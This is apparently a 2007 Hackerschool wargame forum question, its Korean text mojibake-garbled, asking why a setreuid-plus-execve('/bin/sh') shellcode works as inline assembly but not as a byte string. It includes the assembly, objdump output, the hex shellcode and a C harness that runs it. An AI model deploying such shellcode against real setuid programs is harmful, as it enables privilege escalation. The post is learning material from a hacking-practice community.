|
http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=742 [º¹»ç]
¾È³çÇϼ¼¿ä BOF¸¦ °øºÎÇÏ¸é¼ ½©Äڵ带 ¸¸µé¾ú½À´Ï´Ù.
¿©±â ÇØÄ¿½ºÄð ¼¹ö¸¦ »ç¿ëÇߴµ¥¿ä ..
·¹º§ 9 ¿¡¼ ½©Äڵ带 ¸¸µé¾î¼ ·¹º§ 1¿¡¼ ½©Äڵ带 ½ÇÇàÇϸé uid°¡
·¹º§ 9·Î ¹Ù²î°Ô ¸¸µé¾ú½À´Ï´Ù.
¹®Á¦´Â ÀÌ°Ô ¾î¼Àºí¸®ÄÚµå·Î ÄÚµùÇÑ°É ÄÄÆÄÀÏÇϸé Á¦´ë·Î ÀÛµ¿Çϴµ¥
ÀÌ°ÍÀ» ±â°è¾î·Î ¹Ù²ã¼ c¾ð¾î·Î ÄÚµùÇÑ´ÙÀ½ ½ÇÇàÇÏ¸é ½©Àº ¶ç¿öÁö´Âµ¥
uid ´Â ¹Ù²îÁö°¡ ¾Ê½À´Ï´Ù.
ÀúÀÇ ½©Äڵ带 ¿Ã¸³´Ï´Ù!
--------------- ½©ÄÚµå (¾î¼Àºí¸® ÄÚµå) ------------------------------
void main()
{
// À̺κÐÀÌ setreuid ºÎºÐÀÔ´Ï´Ù.
__asm__ __volatile__(
"mov $0xbc1, %bx \n\t" // NULLÁ¦°Å ÇÏ·Á°í bx¿¡ 3009(uid)³Ö¾ú½À´Ï´Ù.
"mov $0xbc1, %cx \n\t" // NULLÁ¦°Å ÇÏ·Á°í cx¿¡ 3009(uid)³Ö¾ú½À´Ï´Ù.
"mov $0x46, %al \n\t" // setreuid ¹øÈ£ÀÎ 46À» al¿¡ ³Ö¾ú±¸¿ä.
"int $0x80 \n\t" // ÀÎÅÍ·´Æ®¸¦ °É¾ú½À´Ï´Ù.
// ¿©±â¼ºÎÅÍ´Â ½©ÄÚµå ÀÔ´Ï´Ù.
"xor %eax, %eax \n\t"
"push %eax \n\t"
"push $0x68732f2f \n\t"
"push $0x6e69622f \n\t"
"mov %esp, %ebx \n\t"
"push %eax \n\t"
"push %ebx \n\t"
"mov %esp, %ecx \n\t"
"mov %eax, %edx \n\t"
"mov $0xb, %al \n\t"
"int $0x80 \n\t"
);
}
---------------------------------------------------------------
À§ÀÇ ¼Ò½º´Â ÄÄÆÄÀÏÇϸé Àß ÀÛµ¿ÇÕ´Ï´Ù. ÄÄÆÄÀϳ¡³ª°í ·¹º§9·Î
setuid ºñÆ® °É¾îÁÖ°í³ª¼ ·¹º§1¿¡¼ ½ÇÇàÇϸé uid°¡ ·¹º§9·Î ¹Ù²ò´Ï´Ù.
À̹ø¿¡´Â À§¿¡ ¼Ò½º¸¦ ÄÄÆÄÀÏÇÏ°í³ª¼ objdump·Î ¶á°ÍÀÔ´Ï´Ù.
---------------------------------------------------------------------
080482f4 <main>:
80482f4: 55 push %ebp
80482f5: 89 e5 mov %esp,%ebp
80482f7: 83 ec 08 sub $0x8,%esp
80482fa: 83 e4 f0 and $0xfffffff0,%esp
80482fd: b8 00 00 00 00 mov $0x0,%eax
8048302: 29 c4 sub %eax,%esp
8048304: 66 bb c1 0b mov $0xbc1,%bx
8048308: 66 b9 c1 0b mov $0xbc1,%cx
804830c: b0 46 mov $0x46,%al
804830e: cd 80 int $0x80
8048310: 31 c0 xor %eax,%eax
8048312: 50 push %eax
8048313: 68 2f 2f 73 68 push $0x68732f2f
8048318: 68 2f 62 69 6e push $0x6e69622f
804831d: 89 e3 mov %esp,%ebx
804831f: 50 push %eax
8048320: 53 push %ebx
8048321: 89 e1 mov %esp,%ecx
8048323: 89 c2 mov %eax,%edx
8048325: b0 0b mov $0xb,%al
8048327: cd 80 int $0x80
8048329: c9 leave
804832a: c3 ret
804832b: 90 nop
---------------------------------------------------------------------
main ºÎºÐ¸¸ µû·Î »°½À´Ï´Ù. À§¿Í°°ÀÌ ³ª¿Í¼ ÀÌÁ¦ ±â°è¾î ºÎºÐ¸¸ µû·Î
»©¼ ÄÚµùÀ» Çß½À´Ï´Ù. ÀÌÁ¦ ¾Æ·¡¿¡ ³ª¿À´Â ¼Ò½º°¡ ¹®Á¦ÀÇ ¼Ò½ºÀÔ´Ï´Ù.
---------------------------------------------------------------------
char sc[] =
// À̺κÐÀÌ setreuid()ºÎºÐÀÔ´Ï´Ù.
"\x66\xbb\xc1\x0b\x66\xb9\xc1\x0b\xb0\x46\xcd\x80"
// ¾Æ·¡ºÎºÐÀº ½©ÄÚµå ºÎºÐÀÔ´Ï´Ù.
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
int main()
{
void (*pointer)(void);
pointer=(void*)sc;
pointer();
}
----------------------------------------------------------------------
ÀÌ°É ÄÄÆÄÀÏÇÏ°í³ª¼ ·¹º§9·Î setuid ºñÆ® °É¾îÁØ´ÙÀ½ ·¹º§1¿¡¼ ½ÇÇàÇϸé
·¹º§9·Î uid°¡ ¹Ù²î¾î¾ß Çϴµ¥ ¹Ù²îÁö ¾Ê½À´Ï´Ù.
´ÜÁö ½©¸¸ ¶å´Ï´Ù.. (·¹º§1ÀÇ ½©)
ÀÌÀ¯°¡ ¹«¾ùÀÎÁö ¸ð¸£°Ú½À´Ï´Ù. ¾î¼Àºí¸® ÄÚµå´Â Àß ÀÛµ¿Çϴµ¥ ¶È°°ÀÌ
±â°è¾î·Î¸¸ ¹Ù²Ù¾ú´Âµ¥ ÀÛµ¿ÀÌ ¾ÈµË´Ï´Ù ..
¿¡±¸ Áú¹®ÀÌ ³Ê¹« ±æ¾ú³×¿ä ...
Ȥ½Ã ¾Æ½Ã´ÂºÐ ´äº¯ ºÎŹµå¸³´Ï´Ù ¤Ð
ÁÁÀº ¹ã µÇ¼¼¿ä ~ |
Hit : 3812 Date : 2007/07/14 12:07
|
1574, 
1/79 
